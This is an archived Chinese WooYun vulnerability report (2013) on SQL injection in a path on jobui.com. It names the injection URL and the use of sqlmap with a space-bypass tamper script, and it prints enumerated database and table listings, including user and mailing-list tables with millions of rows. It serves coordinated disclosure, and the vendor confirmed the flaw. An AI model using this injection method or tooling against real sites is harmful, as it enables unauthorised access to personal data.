漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-041992
漏洞标题:职友集网主站SQL注入(N百W信息泄露)
相关厂商:职友集网
漏洞作者: xiaoL
提交时间:2013-11-04 22:26
修复时间:2013-12-19 22:50
公开时间:2013-12-19 22:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-04: 细节已通知厂商并且等待厂商处理中
2013-11-09: 厂商已经确认,细节仅向厂商公开
2013-11-19: 细节向核心白帽子及相关领域专家公开
2013-11-29: 细节向普通白帽子公开
2013-12-09: 细节向实习白帽子公开
2013-12-19: 细节向公众公开
简要描述:
都说标题虎加快审核进度,所以也虎一虎。
职友集网主站SQL注入
详细说明:
发生注入的地点:
http://www.jobui.com/mianshiti/it/java'/
这个位置还真心注了我半天...后端貌似不遵守RFC标准
所以出现URL编码都无法注入
导致构造语句用了非常久!
漏洞证明:
一样的,构造完语句,就可以用sqlmap来跑了...
为了跑这个,还使用了space2mysqlblank.py脚本。
所以熟读使用手册是一个好习惯。
这个用户权限还是挺大的,主要数据库都可以跑,全部都读得出来
用count参数查了下有多少数据...
果然不失所望!
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
Database: jobui_status
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_job_filter | 9458 |
| tb_company_filter | 587 |
+---------------------------------------+---------+
Database: jobui_job
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_job_status_filter | 873686 |
| tb_wiki_item | 1242 |
| tb_wiki_count | 691 |
| tb_wiki | 621 |
| tb_wiki_type | 69 |
+---------------------------------------+---------+
Database: system_setting
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_article_status | 7470 |
| tb_article_info | 7469 |
| tb_sort_area | 3211 |
| tb_subject | 633 |
| tb_subject_bak | 628 |
| tb_subject_info | 552 |
| tb_subject_info_bak | 543 |
| tb_sort_position | 518 |
| tb_article_type | 71 |
| tb_sort_industry | 53 |
| tb_filter_keyword_bak | 15 |
| tb_filter_keyword | 6 |
+---------------------------------------+---------+
Database: jobui_joke
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_joke | 486 |
+---------------------------------------+---------+
Database: jobui_salary
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_salary_log | 272306 |
| tb_salary_status | 130244 |
+---------------------------------------+---------+
Database: jobui_data
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_company_follow_day | 132809 |
| tb_company_follow_month | 111776 |
| tb_company_comment_day | 14210 |
| tb_company_review_day | 12318 |
| tb_company_comment_month | 12294 |
| tb_company_review_month | 10620 |
+---------------------------------------+---------+
Database: jobui_user
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_user_wx_log | 160639 |
| tb_user_jobSearcher | 82732 |
| tb_user_employmentReport | 79799 |
| tb_user | 66838 |
| tb_user_contact | 66834 |
| tb_user_domain | 66834 |
| tb_user_experience | 66834 |
| tb_user_info | 66834 |
| tb_user_photo | 66834 |
| tb_user_mapping | 66729 |
| tb_user_status | 65996 |
| tb_user_wx | 50431 |
| tb_user_status_follow | 1810 |
| tb_user_status_review | 669 |
| tb_user_status_comment | 573 |
| tb_user_status_photo | 139 |
+---------------------------------------+---------+
Database: jobui_company
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_company_status_job | 8529550 |
| `tb_company_impression-list` | 1220055 |
| tb_impression | 691870 |
| tb_company_status_impression | 469148 |
| `tb_company_photo-content` | 433974 |
| `tb_company_photo-list` | 433974 |
| tb_company_status_filter | 388842 |
| tb_company_salary | 351421 |
| tb_impression_company | 339481 |
| tb_company_news | 203298 |
| tb_company_status_news | 203298 |
| tb_interview_content | 173456 |
| tb_interview | 173455 |
| `tb_company_follow-list` | 160037 |
| tb_interview_job | 137162 |
| tb_company_status_follow | 120325 |
| `tb_company_grade-list` | 87419 |
| tb_company_impression_log | 83569 |
| tb_interview_mapping | 55593 |
| `tb_comment_grade-list` | 49859 |
| tb_company_status_photo | 38496 |
| tb_pay | 36262 |
| `tb_company_comment-list` | 35558 |
| `tb_company_comment-content` | 35470 |
| `tb_company_review-list` | 34267 |
| `tb_company_review-content` | 34266 |
| tb_company_status_comment | 25134 |
| tb_company_status_review | 23344 |
| `tb_company_pay-list` | 22318 |
| tb_company_status_grade | 19159 |
| tb_company_status | 18838 |
| tb_company_status_pay | 18150 |
| tb_company_follow | 17296 |
| tb_comment | 12141 |
| tb_comment_status | 12061 |
| tb_comment_grade | 8335 |
| tb_comment_content | 6735 |
| tb_photo | 6186 |
| tb_photo_count | 6186 |
| tb_review_content | 5402 |
| tb_company_grade | 4751 |
| tb_company_pay | 4393 |
| tb_company_status_logo | 3398 |
| tb_company_edit_log | 1463 |
| tb_logo | 455 |
| tb_accusation | 322 |
+---------------------------------------+---------+
Database: jobui_site
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_info | 20 |
+---------------------------------------+---------+
Database: jobui_mail
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `tb_market_mail_list-personal` | 9566912 |
| tb_market_mail_list | 9566912 |
| `tb_system_mail_list-personal` | 3597191 |
| tb_system_mail_list | 3597191 |
| `tb_subscribe_mail_list-personal` | 1553361 |
| tb_subscribe_mail_list | 1553361 |
| tb_email_template | 12 |
| tb_email_structure | 5 |
+---------------------------------------+---------+
Database: jobui_bbs
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pre_common_district | 45051 |
| pre_common_setting | 397 |
| pre_common_stylevar | 135 |
| pre_common_block_style | 103 |
| pre_common_syscache | 103 |
| pre_common_smiley | 85 |
| pre_common_admincp_perm | 67 |
| pre_common_nav | 52 |
| pre_common_member_profile_setting | 51 |
| pre_forum_forumfield | 35 |
| pre_forum_forum | 34 |
| pre_common_credit_rule | 31 |
| pre_ucenter_settings | 26 |
| pre_common_cron | 20 |
| pre_common_usergroup | 20 |
| pre_common_usergroup_field | 20 |
| pre_home_click | 15 |
| pre_forum_medal | 10 |
| pre_common_plugin | 9 |
| pre_forum_statlog | 9 |
| pre_common_admingroup | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_common_stat | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_common_admincp_cmenu | 3 |
| pre_common_style | 3 |
| pre_common_template | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_common_admincp_session | 2 |
| pre_common_block | 2 |
| pre_common_failedlogin | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_mobile_setting | 2 |
| pre_common_credit_rule_log | 1 |
| pre_common_diy_data | 1 |
| pre_common_member | 1 |
| pre_common_member_count | 1 |
| pre_common_member_field_forum | 1 |
| pre_common_member_field_home | 1 |
| pre_common_member_profile | 1 |
| pre_common_member_status | 1 |
| pre_common_onlinetime | 1 |
| pre_common_statuser | 1 |
| pre_forum_threadprofile | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_memberfields | 1 |
| pre_ucenter_members | 1 |
+---------------------------------------+---------+
Database: jobui_system
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tb_survey_vote | 18606 |
| tb_vote | 1109 |
| tb_vote_status | 416 |
| tb_comment | 119 |
| tb_survey_option | 5 |
| tb_topic | 3 |
| tb_survey | 2 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3980 |
| STATISTICS | 1597 |
| KEY_COLUMN_USAGE | 535 |
| TABLE_CONSTRAINTS | 436 |
| PARTITIONS | 430 |
| TABLES | 430 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 276 |
| SESSION_VARIABLES | 276 |
| SCHEMA_PRIVILEGES | 192 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 92 |
| COLLATIONS | 91 |
| CHARACTER_SETS | 28 |
| SCHEMATA | 13 |
| PLUGINS | 6 |
| ENGINES | 5 |
| PROCESSLIST | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
修复方案:
过滤转义该参数...
版权声明:转载请注明来源 xiaoL@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-11-09 10:37
厂商回复:
感谢乌云的技术,我司正在进行漏洞处理
最新状态:
暂无